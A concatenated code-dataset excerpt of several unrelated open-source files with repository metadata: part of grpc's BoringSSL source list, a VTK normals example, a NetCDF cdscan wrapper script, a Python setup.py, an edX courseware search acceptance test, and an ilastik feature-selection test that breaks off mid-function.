'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/sha256-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/sha512-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/vpaes-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/x86_64-mont.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/x86_64-mont5.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/test/trampoline-x86_64.S',
'third_party/boringssl-with-bazel/src/crypto/hrss/asm/poly_rq_mul.S',
],
'crypto_mac_x86': [
'third_party/boringssl-with-bazel/mac-x86/crypto/chacha/chacha-x86.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/aesni-x86.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/bn-586.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/co-586.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/ghash-ssse3-x86.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/ghash-x86.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/md5-586.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/sha1-586.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/sha256-586.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/sha512-586.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/vpaes-x86.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/x86-mont.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/test/trampoline-x86.S',
],
'crypto_mac_x86_64': [
'third_party/boringssl-with-bazel/mac-x86_64/crypto/chacha/chacha-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/cipher_extra/aes128gcmsiv-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/cipher_extra/chacha20_poly1305_x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/aesni-gcm-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/aesni-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/ghash-ssse3-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/ghash-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/md5-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/p256-x86_64-asm.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/p256_beeu-x86_64-asm.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/rdrand-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/rsaz-avx2.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/sha1-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/sha256-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/sha512-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/vpaes-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/x86_64-mont.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/x86_64-mont5.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/test/trampoline-x86_64.S',
],
'crypto_win_aarch64': [
'third_party/boringssl-with-bazel/win-aarch64/crypto/chacha/chacha-armv8.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/aesv8-armx64.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/armv8-mont.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/ghash-neon-armv8.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/ghashv8-armx64.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/sha1-armv8.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/sha256-armv8.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/sha512-armv8.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/vpaes-armv8.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/test/trampoline-armv8.S',
],
'crypto_win_x86': [
'third_party/boringssl-with-bazel/win-x86/crypto/chacha/chacha-x86.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/aesni-x86.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/bn-586.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/co-586.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/ghash-ssse3-x86.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/ghash-x86.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/md5-586.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/sha1-586.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/sha256-586.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/sha512-586.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/vpaes-x86.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/x86-mont.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/test/trampoline-x86.asm',
],
'crypto_win_x86_64': [
'third_party/boringssl-with-bazel/win-x86_64/crypto/chacha/chacha-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/cipher_extra/aes128gcmsiv-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/cipher_extra/chacha20_poly1305_x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/aesni-gcm-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/aesni-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/ghash-ssse3-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/ghash-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/md5-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/p256-x86_64-asm.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/p256_beeu-x86_64-asm.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/rdrand-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/rsaz-avx2.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/sha1-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/sha256-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/sha512-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/vpaes-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/x86_64-mont.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/x86_64-mont5.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/test/trampoline-x86_64.asm',
],
}
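# A minimal sketch (an assumption for illustration, not grpc's actual build
# logic) of how a build script might pick one ASM group out of the
# ASM_SOURCE_FILES dict above. The 'crypto_<os>_<arch>' key format comes from
# the dict keys; the mapping from Python's platform module values to those
# keys is illustrative only.
import platform

def select_asm_sources(asm_groups):
    """Return the ASM source list matching the current OS/arch, or [] if none."""
    os_key = {'linux': 'linux', 'darwin': 'mac', 'windows': 'win'}.get(
        platform.system().lower())
    arch_key = {'x86_64': 'x86_64', 'amd64': 'x86_64',
                'aarch64': 'aarch64', 'arm64': 'aarch64'}.get(
        platform.machine().lower())
    if os_key is None or arch_key is None:
        return []  # unknown platform: fall back to a no-asm build
    return asm_groups.get('crypto_%s_%s' % (os_key, arch_key), [])

# Example: ASM_SOURCES = select_asm_sources(ASM_SOURCE_FILES)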
|
ctiller/grpc
|
src/python/grpcio/grpc_core_dependencies.py
|
Python
|
apache-2.0
| 88,940
|
[
"ORCA"
] |
1539327e7f6064081c95826e0ba9119d511e8d89f0497d82885e164322a648d3
|
from __future__ import print_function
import vtk
def main():
    # Set up a sphere source and copy its output into a fresh vtkPolyData
sphereSource = vtk.vtkSphereSource()
sphereSource.Update()
polydata = vtk.vtkPolyData()
polydata.ShallowCopy(sphereSource.GetOutput())
normals = polydata.GetPointData().GetNormals()
normal0 = normals.GetTuple3(0)
print("Normal0: {:3.1f} {:3.1f} {:3.1f}".format(normal0[0], normal0[1], normal0[2]))
if __name__ == '__main__':
main()
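# A short extension of the example above (assumes the same `vtk` module and
# the polydata built in main()): loop over every point normal instead of only
# index 0. GetNumberOfTuples() and GetTuple3() are standard vtkDataArray
# accessors.
def print_all_normals(polydata):
    normals = polydata.GetPointData().GetNormals()
    for i in range(normals.GetNumberOfTuples()):
        n = normals.GetTuple3(i)
        print("Normal{}: {:3.1f} {:3.1f} {:3.1f}".format(i, n[0], n[1], n[2]))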
|
lorensen/VTKExamples
|
src/Python/Arrays/GetValues.py
|
Python
|
apache-2.0
| 452
|
[
"VTK"
] |
e94f9b66ec09d284e1a05ffb600b31b7157029f32fb82950653726ef4010b35e
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# Arguments marked as "Required" below must be included for upload to PyPI.
# Fields marked as "Optional" may be commented out.
setup(
# This is the name of your project. The first time you publish this
# package, this name will be registered for you. It will determine how
# users can install this project, e.g.:
#
# $ pip install sampleproject
#
# And where it will live on PyPI: https://pypi.org/project/sampleproject/
#
# There are some restrictions on what makes a valid project name
# specification here:
# https://packaging.python.org/specifications/core-metadata/#name
name='moloi', # Required
# Versions should comply with PEP 440:
# https://www.python.org/dev/peps/pep-0440/
#
# For a discussion on single-sourcing the version across setup.py and the
# project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='1.0.0', # Required
# This is a one-line description or tagline of what your project does. This
# corresponds to the "Summary" metadata field:
# https://packaging.python.org/specifications/core-metadata/#summary
description='SMILES classification', # Required
# This is an optional longer description of your project that represents
# the body of text which users will see when they visit PyPI.
#
# Often, this is the same as your README, so you can just read it in from
# that file directly (as we have already done above)
#
# This field corresponds to the "Description" metadata field:
# https://packaging.python.org/specifications/core-metadata/#description-optional
#long_description=long_description, # Optional
# Denotes that our long_description is in Markdown; valid values are
# text/plain, text/x-rst, and text/markdown
#
# Optional if long_description is written in reStructuredText (rst) but
# required for plain-text or Markdown; if unspecified, "applications should
# attempt to render [the long_description] as text/x-rst; charset=UTF-8 and
# fall back to text/plain if it is not valid rst" (see link below)
#
# This field corresponds to the "Description-Content-Type" metadata field:
# https://packaging.python.org/specifications/core-metadata/#description-content-type-optional
#long_description_content_type='text/markdown', # Optional (see note above)
# This should be a valid link to your project's main homepage.
#
# This field corresponds to the "Home-Page" metadata field:
# https://packaging.python.org/specifications/core-metadata/#home-page-optional
url='https://github.com/DentonJC/virtual_screening', # Optional
# This should be your name or the name of the organization which owns the
# project.
author='DentonJC', # Optional
# This should be a valid email address corresponding to the author listed
# above.
author_email='', # Optional
# Classifiers help users find your project by categorizing it.
#
# For a list of valid classifiers, see https://pypi.org/classifiers/
classifiers=[ # Optional
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish
        'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
# This field adds keywords for your project which will appear on the
# project page. What does your project relate to?
#
# Note that this is a string of words separated by whitespace, not a list.
keywords='SMILES classification keras', # Optional
# You can just specify package directories manually here if your project is
# simple. Or you can use find_packages().
#
# Alternatively, if you just want to distribute a single Python file, use
# the `py_modules` argument instead as follows, which will expect a file
# called `my_module.py` to exist:
#
# py_modules=["my_module"],
#
packages=find_packages(exclude=['contrib', 'docs', 'tests']), # Required
# This field lists other packages that your project depends on to run.
# Any package you put here will be installed by pip when your project is
# installed, so they must be valid existing projects.
#
# For an analysis of "install_requires" vs pip's requirements files see:
# https://packaging.python.org/en/latest/requirements.html
    install_requires=['pandas', 'keras', 'scikit-learn', 'matplotlib',
                      'reportlab', 'seaborn', 'joblib', 'xgboost', 'mordred',
                      'configparser', 'argparse'],  # Optional
# List additional groups of dependencies here (e.g. development
# dependencies). Users will be able to install these using the "extras"
# syntax, for example:
#
# $ pip install sampleproject[dev]
#
# Similar to `install_requires` above, these must be valid existing
# projects.
#extras_require={ # Optional
# 'dev': ['check-manifest'],
# 'test': ['coverage'],
#},
# If there are data files included in your packages that need to be
# installed, specify them here.
#
# If using Python 2.6 or earlier, then these have to be included in
# MANIFEST.in as well.
#package_data={ # Optional
# 'sample': ['package_data.dat'],
#},
    # Although 'package_data' is the preferred approach, in some cases you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
#
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
#data_files=[('moloi_data', ['data/'])], # Optional
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# `pip` to create the appropriate form of executable for the target
# platform.
#
# For example, the following would provide a command called `sample` which
# executes the function `main` from this package when invoked:
#entry_points={ # Optional
# 'console_scripts': [
# 'sample=sample:main',
# ],
#},
# List additional URLs that are relevant to your project as a dict.
#
# This field corresponds to the "Project-URL" metadata fields:
# https://packaging.python.org/specifications/core-metadata/#project-url-multiple-use
#
# Examples listed include a pattern for specifying where the package tracks
# issues, where the source is hosted, where to say thanks to the package
# maintainers, and where to support the project financially. The key is
# what's used to render the link text on PyPI.
#project_urls={ # Optional
# 'Bug Reports': 'https://github.com/pypa/sampleproject/issues',
# 'Funding': 'https://donate.pypi.org',
# 'Say Thanks!': 'http://saythanks.io/to/example',
# 'Source': 'https://github.com/pypa/sampleproject/',
#},
)
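# The comments above mention single-sourcing the version between setup.py and
# the package code. A minimal sketch of that pattern follows: parse
# __version__ out of the package's __init__.py instead of hard-coding
# version='1.0.0'. The 'moloi/__init__.py' path is an assumption for
# illustration, not taken from this project; to adopt it, pass
# version=read_version() to setup().
import re

def read_version(package_init=path.join(here, 'moloi', '__init__.py')):
    with open(package_init, encoding='utf-8') as f:
        match = re.search(r"^__version__\s*=\s*['\"]([^'\"]+)['\"]",
                          f.read(), re.M)
    if not match:
        raise RuntimeError('Unable to find a __version__ string.')
    return match.group(1)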
|
DentonJC/virtual_screening
|
setup.py
|
Python
|
gpl-3.0
| 8,119
|
[
"VisIt"
] |
0d30a3130dfb4a4ca121c7e290d1c6cb730237ba08f1b95fbb929ff153ff8144
|
#!/usr/bin/env python
"""
Filename: version_safe_cdscan.py
Description: Create a xml catalogue of NetCDF files using cdscan
Input: List on XML files
Output: XML catalogue file suitable for use with CDAT/UV-CDAT (cdms python library)
Author: David Kent David.Kent@csiro.au
Revisions: Tim Bedin Tim.Bedin@csiro.au
Tim Erwin Tim.Erwin@csiro.au
Copyright: CSIRO, 2011
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys, re, os
from optparse import OptionParser
import subprocess
import numpy as np
#CDAT
import cdms2
__version__ = '$Id$'
def cdscan(inputs, output):
cmds = ['cdscan', '-x', output] + inputs
subprocess.Popen(cmds).wait()
def change_permissions(ifile):
cmds = ['chmod', '775', ifile]
subprocess.Popen(cmds).wait()
def overlaps(m, ms):
for testm in ms:
if int(m.group(1)) < int(testm.group(2)) and \
int(m.group(2)) > int(testm.group(1)):
return True
return False
def check_time_axis(ifile):
# Check the output to ensure that the time-axis is complete.
c = cdms2.open(ifile)
if 'time' in c.axes:
t = c.axes['time']
if len(t) <= 1:
c.close()
return 0
# Need to allow time-axis with units in "days since ..." to
# vary a little.
dt = t[1] - t[0]
if t.units.startswith("days"):
mindt = dt - 3
maxdt = dt + 3
else:
mindt = dt
maxdt = dt
diff_ts = [elem[1] - elem[0] for elem in \
zip(t[:-1], t[1:])]
#check = np.logical_and(mindt <= diff_ts,
# maxdt >= diff_ts)
#print mindt <= diff_ts
check = t[1:][np.logical_or(diff_ts < mindt,diff_ts > maxdt)]
if len(check) > 0:
# Not constantly increasing time-axis.
print('\nERROR:\tTime axis not consistently monotonically increasing.')
print('\tCheck that input files represent entire time period')
#Print Problem Files
import cdtime
print("\tBoundaries of problem time points")
for tp in check:
print('\t\t'),
tindex = np.where(t==tp)[0][0]
for invalid_t in t[tindex-1:tindex+1]:
print('%s,' % cdtime.reltime(invalid_t,t.units).tocomp()),
print('\n')
c.close()
return 1
c.close()
return 0
def main(inputs, output, ignore=False):
"""Run the program.
"""
vpat = re.compile(r'(v\d+)/')
inputs_with_version = filter(vpat.search, inputs)
if inputs_with_version:
inputs_version_stripped = map(lambda s: vpat.sub('', s), inputs)
inputs_versions = map(vpat.search, inputs)
latest_versions = []
handled = []
for i in range(len(inputs)):
if i in handled:
continue
current = inputs_version_stripped[i]
if inputs_version_stripped.count(current) > 1:
idxs = [j for j, f in enumerate(inputs_version_stripped) \
if f == current]
versions = [inputs_versions[j] for j in idxs]
            greatest = versions.index(
                max(versions, key=lambda m: int(m.group(1)[1:])))  # compare version numbers, not match objects
greatest_idxs = idxs[greatest]
latest_versions.append(inputs[greatest_idxs])
handled += idxs
else:
latest_versions.append(inputs[i])
handled.append(i)
inputs = latest_versions
# Some CMIP3 datasets have two files representing that same variable/
# time-period. We want to strip out duplicates....
#date_pat = re.compile(r'(\d{4,6})[\d-]*.*(\d{4,6})[\d-]*')
date_pat = re.compile(r'(\d{4,10})-(\d{4,10})')
inputs_with_dates = map(date_pat.search, inputs)
if any(inputs_with_dates) and not all(inputs_with_dates):
# limit only to those with dates
newinputs = []
for i, has_date in enumerate(inputs_with_dates):
if has_date:
newinputs.append(inputs[i])
inputs = newinputs
elif all(inputs_with_dates):
used_so_far = []
for i, has_date in enumerate(inputs_with_dates):
if not overlaps(has_date, [t[0] for t in used_so_far]):
used_so_far.append((has_date, inputs[i]))
else:
                print('Warning: file overlaps. Skipping. ' + inputs[i])
inputs = [t[1] for t in used_so_far]
for infile in inputs:
if check_time_axis(infile):
print("Error in time axis of file %s" % infile)
sys.exit(1)
cdscan(inputs, output)
if ignore:
return
# Check the output to ensure that the time-axis is complete.
if check_time_axis(output):
print("\tRemoving file %s" % output)
os.remove(output)
sys.exit(1)
# Change permissions for the cdscan.
change_permissions(output)
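# Illustration only: a self-contained version of the "keep only the latest
# vN/ version of each path" de-duplication performed inside main(), handy for
# testing that selection logic without invoking cdscan. Numeric comparison
# avoids the lexicographic pitfall of 'v10' < 'v9'.
def latest_version_only(paths):
    vpat = re.compile(r'v(\d+)/')
    best = {}  # version-stripped path -> (version number, original path)
    for p in paths:
        m = vpat.search(p)
        key = vpat.sub('', p)
        version = int(m.group(1)) if m else -1
        if key not in best or version > best[key][0]:
            best[key] = (version, p)
    return [p for _, p in best.values()]

# Example: latest_version_only(['a/v1/x.nc', 'a/v2/x.nc']) -> ['a/v2/x.nc']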
if __name__ == '__main__':
usage = "usage: %prog [options] input output \n" + \
" input:\tInput file name\n"+\
" output:\tOutput file name"
parser = OptionParser(usage=usage, version=__version__)
parser.add_option("-i", "--ignore-check",
action="store_true", dest="ignore", default=False,
help="Print the names of the files.")
#parser.add_option("-y", "--num-years",
# dest="numyears", default=None, type="int",
# help="Try and concatenate total number of years, YEARS, from the end of the catalogue. start_date and end_date ignored. ")
(options, args) = parser.parse_args()
if len(args) < 2:
parser.print_usage()
sys.exit(1)
main(args[:-1], args[-1], options.ignore)
|
paolap/cwsl-ctools
|
aggregation/version_safe_cdscan.py
|
Python
|
apache-2.0
| 6,261
|
[
"NetCDF"
] |
ee2f86def5502082882b5de2cfa42c0697dfc2e77ec952271695307b27a0fd22
|
"""
Test courseware search
"""
import json
from common.test.acceptance.fixtures.course import CourseFixture, XBlockFixtureDesc
from common.test.acceptance.pages.common.auto_auth import AutoAuthPage
from common.test.acceptance.pages.common.logout import LogoutPage
from common.test.acceptance.pages.common.utils import click_css
from common.test.acceptance.pages.lms.course_home import CourseHomePage
from common.test.acceptance.pages.lms.courseware_search import CoursewareSearchPage
from common.test.acceptance.pages.studio.container import ContainerPage
from common.test.acceptance.pages.studio.overview import CourseOutlinePage as StudioCourseOutlinePage
from common.test.acceptance.pages.studio.utils import add_html_component, type_in_codemirror
from common.test.acceptance.tests.helpers import UniqueCourseTest, remove_file
class CoursewareSearchTest(UniqueCourseTest):
"""
Test courseware search.
"""
USERNAME = 'STUDENT_TESTER'
EMAIL = 'student101@example.com'
STAFF_USERNAME = "STAFF_TESTER"
STAFF_EMAIL = "staff101@example.com"
HTML_CONTENT = """
Someday I'll wish upon a star
And wake up where the clouds are far
Behind me.
Where troubles melt like lemon drops
Away above the chimney tops
That's where you'll find me.
"""
SEARCH_STRING = "chimney"
EDITED_CHAPTER_NAME = "Section 2 - edited"
EDITED_SEARCH_STRING = "edited"
TEST_INDEX_FILENAME = "test_root/index_file.dat"
shard = 5
def setUp(self):
"""
Create search page and course content to search
"""
# create test file in which index for this test will live
with open(self.TEST_INDEX_FILENAME, "w+") as index_file:
json.dump({}, index_file)
self.addCleanup(remove_file, self.TEST_INDEX_FILENAME)
super(CoursewareSearchTest, self).setUp()
self.course_home_page = CourseHomePage(self.browser, self.course_id)
self.studio_course_outline = StudioCourseOutlinePage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
course_fix = CourseFixture(
self.course_info['org'],
self.course_info['number'],
self.course_info['run'],
self.course_info['display_name']
)
course_fix.add_children(
XBlockFixtureDesc('chapter', 'Section 1').add_children(
XBlockFixtureDesc('sequential', 'Subsection 1')
)
).add_children(
XBlockFixtureDesc('chapter', 'Section 2').add_children(
XBlockFixtureDesc('sequential', 'Subsection 2')
)
).install()
def _auto_auth(self, username, email, staff):
"""
Logout and login with given credentials.
"""
LogoutPage(self.browser).visit()
AutoAuthPage(self.browser, username=username, email=email,
course_id=self.course_id, staff=staff).visit()
def _studio_publish_content(self, section_index):
"""
Publish content on studio course page under specified section
"""
self._auto_auth(self.STAFF_USERNAME, self.STAFF_EMAIL, True)
self.studio_course_outline.visit()
subsection = self.studio_course_outline.section_at(section_index).subsection_at(0)
subsection.expand_subsection()
unit = subsection.unit_at(0)
unit.publish()
def _studio_edit_chapter_name(self, section_index):
"""
Edit chapter name on studio course page under specified section
"""
self._auto_auth(self.STAFF_USERNAME, self.STAFF_EMAIL, True)
self.studio_course_outline.visit()
section = self.studio_course_outline.section_at(section_index)
section.change_name(self.EDITED_CHAPTER_NAME)
def _studio_add_content(self, section_index):
"""
Add content on studio course page under specified section
"""
self._auto_auth(self.STAFF_USERNAME, self.STAFF_EMAIL, True)
# create a unit in course outline
self.studio_course_outline.visit()
subsection = self.studio_course_outline.section_at(section_index).subsection_at(0)
subsection.expand_subsection()
subsection.add_unit()
        # go to unit and create an HTML component and save (not publish)
unit_page = ContainerPage(self.browser, None)
unit_page.wait_for_page()
add_html_component(unit_page, 0)
unit_page.wait_for_element_presence('.edit-button', 'Edit button is visible')
click_css(unit_page, '.edit-button', 0, require_notification=False)
unit_page.wait_for_element_visibility('.modal-editor', 'Modal editor is visible')
type_in_codemirror(unit_page, 0, self.HTML_CONTENT)
click_css(unit_page, '.action-save', 0)
def _studio_reindex(self):
"""
Reindex course content on studio course page
"""
self._auto_auth(self.STAFF_USERNAME, self.STAFF_EMAIL, True)
self.studio_course_outline.visit()
self.studio_course_outline.start_reindex()
self.studio_course_outline.wait_for_ajax()
def _search_for_content(self, search_term):
"""
Login and search for specific content
Arguments:
search_term - term to be searched for
Returns:
(bool) True if search term is found in resulting content; False if not found
"""
self._auto_auth(self.USERNAME, self.EMAIL, False)
self.course_home_page.visit()
course_search_results_page = self.course_home_page.search_for_term(search_term)
if len(course_search_results_page.search_results.html) > 0:
search_string = course_search_results_page.search_results.html[0]
else:
search_string = ""
return search_term in search_string
# TODO: TNL-6546: Remove usages of sidebar search
def _search_for_content_in_sidebar(self, search_term, perform_auto_auth=True):
"""
Login and search for specific content in the legacy sidebar search
Arguments:
search_term - term to be searched for
perform_auto_auth - if False, skip auto_auth call.
Returns:
(bool) True if search term is found in resulting content; False if not found
"""
if perform_auto_auth:
self._auto_auth(self.USERNAME, self.EMAIL, False)
self.courseware_search_page = CoursewareSearchPage(self.browser, self.course_id)
self.courseware_search_page.visit()
self.courseware_search_page.search_for_term(search_term)
return search_term in self.courseware_search_page.search_results.html[0]
def test_search(self):
"""
Make sure that you can search for something.
"""
# Create content in studio without publishing.
self._studio_add_content(0)
# Do a search, there should be no results shown.
self.assertFalse(self._search_for_content(self.SEARCH_STRING))
# Do a search in the legacy sidebar, there should be no results shown.
self.assertFalse(self._search_for_content_in_sidebar(self.SEARCH_STRING, False))
# Publish in studio to trigger indexing.
self._studio_publish_content(0)
# Do the search again, this time we expect results.
self.assertTrue(self._search_for_content(self.SEARCH_STRING))
# Do the search again in the legacy sidebar, this time we expect results.
self.assertTrue(self._search_for_content_in_sidebar(self.SEARCH_STRING, False))
|
ahmedaljazzar/edx-platform
|
common/test/acceptance/tests/lms/test_lms_courseware_search.py
|
Python
|
agpl-3.0
| 7,715
|
[
"VisIt"
] |
2c6ec259cc52a547740fc36deac9a24a1445d157fdffad624501c38f12f1a4e1
|
###############################################################################
# ilastik: interactive learning and segmentation toolkit
#
# Copyright (C) 2011-2014, the ilastik developers
# <team@ilastik.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# In addition, as a special exception, the copyright holders of
# ilastik give you permission to combine ilastik with applets,
# workflows and plugins which are not covered under the GNU
# General Public License.
#
# See the LICENSE file for details. License information is also available
# on the ilastik web site at:
# http://ilastik.org/license.html
###############################################################################
import os
import numpy
from lazyflow.roi import sliceToRoi
from lazyflow.graph import Graph, OperatorWrapper
from lazyflow.operators.ioOperators import OpInputDataReader
from ilastik.applets.featureSelection.opFeatureSelection import OpFeatureSelection
import vigra
import ilastik.ilastik_logging
ilastik.ilastik_logging.default_config.init()
import tempfile
class TestOpFeatureSelection(object):
def setUp(self):
data = numpy.random.random((2,100,100,100,3))
self.filePath = tempfile.mkdtemp() + '/featureSelectionTestData.npy'
numpy.save(self.filePath, data)
graph = Graph()
# Define operators
opFeatures = OperatorWrapper( OpFeatureSelection, operator_kwargs={'filter_implementation':'Original'}, graph=graph )
opReader = OpInputDataReader(graph=graph)
# Set input data
opReader.FilePath.setValue( self.filePath )
# Connect input
opFeatures.InputImage.resize(1)
opFeatures.InputImage[0].connect( opReader.Output )
# Configure scales
scales = [0.3, 0.7, 1, 1.6, 3.5, 5.0, 10.0]
opFeatures.Scales.setValue(scales)
# Configure feature types
featureIds = [ 'GaussianSmoothing',
'LaplacianOfGaussian',
'StructureTensorEigenvalues',
'HessianOfGaussianEigenvalues',
'GaussianGradientMagnitude',
'DifferenceOfGaussians' ]
opFeatures.FeatureIds.setValue(featureIds)
# Configure matrix
# sigma: 0.3 0.7 1.0 1.6 3.5 5.0 10.0
selections = numpy.array( [[True, False, False, False, False, False, False], # Gaussian
[False, True, False, False, False, False, False], # L of G
[False, False, True, False, False, False, False], # ST EVs
[False, False, False, False, False, False, False], # H of G EVs
[False, False, False, False, False, False, False], # GGM
[False, False, False, False, False, False, False]] ) # Diff of G
opFeatures.SelectionMatrix.setValue(selections)
self.opFeatures = opFeatures
self.opReader = opReader
def tearDown(self):
self.opFeatures.cleanUp()
self.opReader.cleanUp()
        try:
            os.remove(self.filePath)
        except OSError:
            # The temporary file may already be gone.
            pass
def test_basicFunctionality(self):
opFeatures = self.opFeatures
# Compute results for the top slice only
topSlice = [0, slice(None), slice(None), 0, slice(None)]
result = opFeatures.OutputImage[0][topSlice].wait()
numFeatures = numpy.sum(opFeatures.SelectionMatrix.value)
outputChannels = result.shape[-1]
# Input has 3 channels, and one of our features outputs a 3D vector
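        # Gaussian smoothing keeps 3 channels, Laplacian of Gaussian keeps 3,
        # and the structure tensor eigenvalues yield 3 values per channel (9).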
assert outputChannels == 15 # (3 + 3 + 9)
# Debug only -- Inspect the resulting images
if False:
# Export the first slice of each channel of the results as a separate image for display purposes.
import vigra
numFeatures = result.shape[-1]
for featureIndex in range(0, numFeatures):
featureSlice = list(topSlice)
featureSlice[-1] = featureIndex
vigra.impex.writeImage(result[featureSlice], "test_feature" + str(featureIndex) + ".bmp")
def test_2d(self):
graph = Graph()
data2d = numpy.random.random((2,100,100,1,3))
